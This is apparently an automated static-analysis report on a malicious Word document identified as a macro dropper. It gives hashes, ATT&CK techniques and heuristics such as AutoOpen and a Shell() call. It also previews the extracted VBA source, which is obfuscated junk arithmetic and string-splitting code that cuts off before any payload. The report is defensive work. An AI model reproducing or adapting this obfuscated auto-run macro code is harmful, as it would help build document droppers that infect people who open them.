Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 481dafecd132a4dc…

MALICIOUS

Office (OLE)

251.5 KB Created: 2018-02-28 14:46:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 2da2c3c185cc8bbe2134d13093583b5e SHA-1: d6f7c414fa699865be0d5e454e1199bcfb3efdff SHA-256: 481dafecd132a4dc7b37c4784dc6b65b60082c8fbeaaa6b79a715204710f82f8
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The 'OLE_VBA_SHELL' heuristic firing indicates the macro attempts to execute commands. The presence of the 'macros.bas' file and the 'OLE_VBA_AUTOOPEN' heuristic confirm the macro is designed to run automatically upon opening. The ClamAV detection 'Doc.Dropper.Agent-6459455-0' further supports its malicious nature as a dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6459455-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6459455-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 89307 bytes
SHA-256: e3dda091a6da59c413d947044d3ef51b34755528d149a559a1d5a2a15be0d641
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 29 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lPlaicA"
Sub ptFPVjNJInPM()
   On Error Resume Next
   While pJcprIfCc < EfGkpbhHpL
      Set BYEqilQjwzAY = vFJkrUVkMQ
      kPwYi = 5214991 + Round(ZAlolXzIWPS) - 6317644 * Cos(6128242) / HbokR + Chr(PVqCoIDGSprBUR)
      XtHTmlizFR = kwcnIoQiQEJ / zdTsqhXQLOd
   Wend
   Select Case ijQfLjYllJX
      Case 1332323
         ihDlqAWNKI = SssQhATVTtFbX
         SjfYzqFMOLAU = 6003739
      Case 4058562
         HVXXZNT = IDkpCnkZFfBY
         qpNSlFdh = Rnd(3073905)
      Case 2553675
         wHMXhDwWz = Atn(9172603)
         UMADZiluo = Fix(5754609 + 9320735 * 9491010 * jKFnHpGs)
   End Select
   For PqubNsBhiZVTU = 260414 To ijzwVYrC
      wqXwKP = 1932301 - fdzKIwRstHzX
      Select Case zLIoFbpJWR
         Case 4589573
            kfWVCWPPfnqE = ChrW(ZiiDbR - CSng(fhwfOKEnUfIMZ))
            XSuXqkkHw = UEjjtG
         Case 1167433
            AjJCjrGsSbuAfi = ChrB(mBPojlhHXl)
            KKdYtNZNLtLVm = 599361
      End Select
      zSIMwdpZ = Sitn - 8906967
      For iSaJTYmRqh = OtihaSTlajckOn To 2869064
         KpMUkjtPuzEsUZ = (763634 * 9260714 + UjYZfVLWn * Sin(wBhLVEZb - CDbl(iMLizTmaOa) * 3340854 * cjPuE) / 8132630 * CLng(4834979 - CDate(TAzzPvNMoi)) / vwbRJJEYGtvz + 9284611 / (SVVSQRNAw / dPNOEF - mfmWCAOFl / Int(9933335 - Round(SlXDBbzZ) + 8406532 / 8860329)))
      Next
   Next
End Sub
Function qvkikME()
On Error Resume Next
jRcXQQI = "WlCwfRwdfIKjnIW=%MMLzOTBadnlOkrYWhPlBUELUwrnXmN"
aZvoHiV = alzji = (4115434 * 6389660 + bVYNLQMAHHEhF * Sin(dlYWkiE - CDbl(YFQfzr) * 791038 * mOiOav) / 3657924 * CLng(7780649 - CDate(GiKRzbRvP)) / NKIlzp + 3803598 / (TwjTUwwVpzrkiS / zdzuqZdwjikq - ddiZGwzrsnNNUd / Int(7320037 - Round(EiYuZLHz) + 8975127 / 5663137)))
jhCQKsoSAZv = qwwkkGzrM = (3098001 * 3351483 + kTsEqmjVvr * Sin(fDLvZSWjfda - CDbl(twCcHX) * 7330971 * CnAnbhGQM) / 2705498 * CLng(1443292 - CDate(zSRhZKXZqj)) / AKKzIoKZwJRd + 8440641 / (XUsLF / QVwJbfVDw - MjWAAdQhwcCoIS / Int(6581384 - Round(ZiBqiNkJViLB) + 4701853 / 5591925)))
NaQNjznMDl = iuivbdfghnkjgyugjn(jRcXQQI, 25, 16)
rkQGJnbWKf = "wClOLiv% tes&jpEH"
CFXbGJ = WZdrAfukjYWiJ = (2925412 * 207826 + QVltAGHoM * Sin(nwVioFdYRzPm - CDbl(lMFkFspqTwqsjp) * 548042 * QRpiLsvOzjQEl) / 9483425 * CLng(766165 - CDate(dXAjvV)) / wXwUA + 6002782 / (IPbfBfaHmtQqm / bkEWukOIp - zuPsHNYvj / Int(1563179 - Round(BdGvYfVlGP) + 922631 / 6732700)))
rCwiLLkqn = VmtzGuaAZFh = (1453751 * 3091717 + AYVVGivZHwa * Sin(FsWiGsLjX - CDbl(UaoohabYY) * 7674248 * wVMluz) / 843713 * CLng(7120248 - CDate(fuWkphiqzpwhLf)) / ujRzV + 9692301 / (amNIXJzLuGw / qaDEzzwkZi - blqIrNjGPwwTj / Int(4473437 - Round(KUtnupijoir) + 5430257 / 3557190)))
RsosHVEq = iuivbdfghnkjgyugjn(rkQGJnbWKf, 5, 7)
dJTrjsJ = "PpwhJUVXMzEAJbIVTSzWrav% tes&PYZ"
DdGFANb = OkrUAErq = (5197083 * 2874176 + SZjFGrGMZwkHv * Sin(mdAFTRTjHB - CDbl(fSrsrzjVMwmfP) * 2646372 * HVOSddvtNbrk) / 1383094 * CLng(9413222 - CDate(jSiMbYPTh)) / DmjcAwksjKzVoX + 2927029 / (ZdRAPZYpPTA / mMsCj - aqMRMdGs / Int(4650327 - Round(ZOdGzrzlChjd) + 2775887 / 8731140)))
BoEPw = hzhFWRv = (7859644 * 4035514 + YYHRotWBlQBqtF * Sin(MHAwkwcSFffYmB - CDbl(dZIJYTrTN) * 7697065 * cccLqEc) / 1951348 * CLng(1985745 - CDate(vqkAwF)) / lIUkA + 3133496 / (bhjjcUnmKXUz / tobwcqLijXIbN - iFTccMpjIUwh / Int(8013461 - Round(JfMjzPIwj) + 4702775 / 1389817)))
GlGwmbwQkfu = iuivbdfghnkjgyugjn(dJTrjsJ, 4, 9)
PWEswYKoiQ = "vUspNFaBfXwImXdBQY% tesWYhk"
quIiZjV = iPzHZQ = (2732353 * 7759022 + RjVqYiZ * Sin(XBWmiEkqFY - CDbl(wUdujKUwwNRaB) * 8483863 * MCoaLmTIADqV) / 9991996 * CLng(2199645 - CDate(RUsUrqo)) / pjEibNGaVutr + 6509113 / (iMGdL / qppUljwzih - wYQzu / Int(1378222 - Round(rvudV) + 5167725 / 1319173)))
WGswj = jPpfNOfM = (9160662 * 9907882 + kwsQIsntuSRCk * Sin(ClPhNU - CDbl(NQCjHCT) * 7429984 * MVzDXHzf) / 7306
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.